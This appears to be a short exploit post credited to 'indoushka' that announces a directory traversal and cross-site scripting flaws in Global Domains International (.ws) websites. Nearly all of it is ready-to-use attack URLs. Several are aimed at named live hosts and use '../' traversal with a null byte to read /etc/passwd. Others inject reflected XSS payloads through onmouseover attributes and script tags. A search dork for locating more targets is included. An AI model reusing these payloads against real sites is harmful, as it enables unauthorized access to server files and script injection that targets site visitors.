Global Domains International Directory traversal Vulnerability 0-Day
====================================================================
Author : indoushka
vendor : http://www.nic.ws
========================================================
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved

http://www.nic.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11

https://www.website.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11

http://www.7.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11

http://www.movie.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11

http://welcome-back.ws//kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11

Cross site scripting (verified) :

/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22

/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11

/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>

/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>

http://freedom.ws//?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E

freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic